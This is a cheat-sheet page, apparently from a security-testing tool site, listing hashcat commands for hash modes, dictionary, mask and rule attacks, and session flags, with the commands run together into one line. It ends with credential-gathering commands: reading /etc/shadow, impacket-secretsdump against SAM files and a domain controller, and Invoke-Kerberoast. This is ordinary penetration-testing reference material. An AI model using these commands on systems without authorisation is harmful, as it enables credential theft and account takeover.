$loading...
Complete hashcat reference for hash modes, attack types, mask characters, rule-based attacks, and optimization flags. (39 payloads)
hashcat -m 0 hash.txt wordlist.txthashcat -m 100 hash.txt wordlist.txthashcat -m 1400 hash.txt wordlist.txthashcat -m 1000 hash.txt wordlist.txthashcat -m 5500 hash.txt wordlist.txthashcat -m 5600 hash.txt wordlist.txthashcat -m 13100 hash.txt wordlist.txthashcat -m 18200 hash.txt wordlist.txthashcat -m 3200 hash.txt wordlist.txthashcat -m 1800 hash.txt wordlist.txthashcat -m 500 hash.txt wordlist.txthashcat -m 16500 jwt.txt wordlist.txthashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txthashcat -m 0 -a 1 hash.txt wordlist1.txt wordlist2.txthashcat -m 0 -a 3 hash.txt "?l?l?l?l?l?l"hashcat -m 0 -a 6 hash.txt wordlist.txt "?d?d?d"hashcat -m 0 -a 7 hash.txt "?d?d?d" wordlist.txthashcat -m 0 -a 0 hash.txt wordlist.txt -r rules/best64.rule?l?u?d?s?a?bhashcat -m 0 -a 3 hash.txt "?u?l?l?l?d?d?s"hashcat -m 0 -a 0 hash.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rulehashcat -m 0 -a 0 hash.txt wordlist.txt -r /usr/share/hashcat/rules/rockyou-30000.rulehashcat -m 0 -a 0 hash.txt wordlist.txt -r /usr/share/hashcat/rules/d3ad0ne.rulehashcat -m 0 -a 0 hash.txt wordlist.txt -r /usr/share/hashcat/rules/Passw0rd_1337.rulehashcat -m 0 hash.txt wordlist.txt -Ohashcat -m 0 hash.txt wordlist.txt -w 3hashcat -m 0 hash.txt wordlist.txt --session mysessionhashcat --restore --session mysessionhashcat --show -m 0 hash.txthashcat -m 0 hash.txt wordlist.txt --status --status-timer=10cat /etc/shadow | cut -d: -f2 | grep '$6$' > shadow_hashes.txtimpacket-secretsdump -sam SAM -system SYSTEM LOCALimpacket-secretsdump domain/user:pass@dc-ipInvoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty HashLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides